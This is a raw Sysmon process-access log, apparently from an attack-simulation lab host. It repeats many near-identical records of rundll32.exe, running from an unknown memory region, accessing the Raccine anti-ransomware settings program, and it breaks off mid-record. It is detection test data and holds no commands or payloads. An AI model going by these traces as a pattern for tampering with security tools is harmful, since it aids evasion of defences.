10341000x80000000000000002043362Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043361Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043360Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043359Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043358Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043357Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043356Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043355Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043354Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043353Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043352Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043351Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043350Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043349Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043348Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043347Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043346Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043345Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043344Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043343Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043342Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043341Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043340Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043339Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043338Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043337Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043336Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043335Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043334Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043333Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043332Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043331Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043330Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043329Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043328Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043327Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043326Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043325Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043324Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043323Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043322Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043321Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043320Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043319Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043318Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043317Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043316Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043315Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043314Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.865{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043313Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043312Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043311Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043310Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043309Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043308Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043307Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043306Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043305Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043304Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043303Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043302Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043301Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043300Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.864{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043299Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 